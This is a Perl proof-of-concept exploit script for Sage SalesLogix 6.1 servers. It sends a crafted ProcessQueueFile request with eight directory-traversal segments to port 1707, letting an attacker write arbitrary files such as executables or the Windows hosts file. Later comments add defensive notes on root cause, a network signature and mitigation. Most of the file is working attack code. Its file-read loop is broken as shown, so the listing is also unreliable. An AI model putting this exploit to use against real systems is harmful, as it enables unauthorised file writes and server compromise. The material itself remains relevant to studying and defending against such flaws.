#!/usr/bin/perl
#
# Proof of concept exploit: Arbitrary file creation for SLX server 6.1
#
# Written by Carl Livitt, Agenda Security Services, June 2004.
#
# This exploit abuses the ProcessQueueFile command on SLX 6.1 (others?) servers
# to create arbitrary files on the filesystem of the SLX server. By using
# directory traversal, it is possible to escape from the Queue directory and
# write anywhere on the SLX server's filesystem.
#
# Reviewer notes (defensive reading of this listing):
#   * Root cause, as described above: the server accepts a client-supplied
#     file name for ProcessQueueFile and does not confine it to the Queue
#     directory, so "..\" segments walk out of it. The server-side fix is to
#     canonicalise the name and reject anything that resolves outside the
#     queue directory.
#   * What goes on the wire: a single request to TCP port 1707 that contains
#     the literal ASCII command name "ProcessQueueFile", a NUL, and then a run
#     of "..\" segments ahead of the target path. That byte pattern is a
#     usable network signature for this request.
#   * No authentication step appears anywhere in this script; whether the
#     service offers one is not visible from here. Limiting reachability of
#     port 1707 to trusted hosts reduces exposure either way.
#   * The script runs without "use strict" / "use warnings"; every variable
#     below is a package global.
#

use IO::Socket;

# Banner.
print "slx_uploader - Uploads arbitrary files to Sage SalesLogix servers.\n";
print "By Carl Livitt @ Agenda Security Services, June 2004\n\n";

# Exactly three arguments are required ($#ARGV is the last index, so 2 means
# three elements): target host, remote path to create, local file to send.
if($#ARGV!=2) {
    print "Syntax: $0 host filename_to_create file_to_upload\n\n";
    print "Example:\n";
    print " $0 10.0.0.100 \\\\winnt\\\\system32\\\\drivers\\\\etc\\\\hosts evil.txt\n\n";
    print "The above example would upload the local file 'evil.txt' to the SLX\n";
    print "server on 10.0.0.100, overwriting the existing hosts file.\n";
    print "It is possible to upload binary files, e.g. executables, with this exploit.\n\n";
    exit(1);
} else {
    $host=$ARGV[0];
    $create_file=$ARGV[1];
    $upload_file=$ARGV[2];
}

# Element 7 of stat() is the file size in bytes. The 4096-byte cap is enforced
# by this client only; the listing does not show why the limit exists
# (presumably a single-request size constraint -- not confirmed here).
if((stat($upload_file))[7] > 4096) {
    print "[*] Error! Files to be uploaded must be less than 4k in size.\n\n";
    exit(1);
}

print "[+] Building payload\n";
# Length field: a constant 43 plus the length of the requested path. The
# meaning of 43 is not derivable from this listing. The value is emitted as a
# single character via chr().
$contentLen=43 + length($create_file);
# Request layout as built here: 10 NUL bytes, the length character, 3 NUL
# bytes, the NUL-terminated command name, eight "..\" traversal segments, the
# caller-supplied path, then 6 NUL bytes. The file contents are appended after
# this header by the loop below.
$exploit="\x00"x10 . chr($contentLen) . "\x00"x3 . "ProcessQueueFile\x00" . "..\\"x8 . "$create_file" . "\x00"x6;
open(UPLOAD, '<', $upload_file) || die "Could not open local file $upload_file\n";
# NOTE(review): the read expression in the loop condition has no operand in
# this copy of the listing, so the script does not compile as shown. It looks
# like text between angle brackets was stripped when the page was extracted.
while(($line=)) {
    $exploit.=$line;
}
close(UPLOAD);

print "[+] Connecting to server $host:1707\n";
# "||" binds tighter than "=", so $sock receives either the socket object or
# the result of the do-block, which prints a message and exits.
$sock=IO::Socket::INET->new("$host:1707") || do {print "[-] Could not connect to server\n"; exit(1); };

print "[+] Sending exploit payload\n";
# The whole request (header plus file body) goes out in one send() call.
send($sock,$exploit,0);
print "[+] Waiting for response\n";
# Reads up to 1024 bytes of reply. Success is inferred only from the substring
# "Received" appearing in that reply; nothing verifies that the file was
# actually written. A server reply containing that string right after such a
# request is a corroborating indicator for responders.
$sock->recv($data,1024,0);
if($data =~ /Received/) {
    print "[+] Exploit successful\n";
} else {
    print "[*] Exploit may not have worked.\n";
}

# shutdown(2) closes the connection in both directions.
$sock->shutdown(2);

# milw0rm.com [2004-10-18]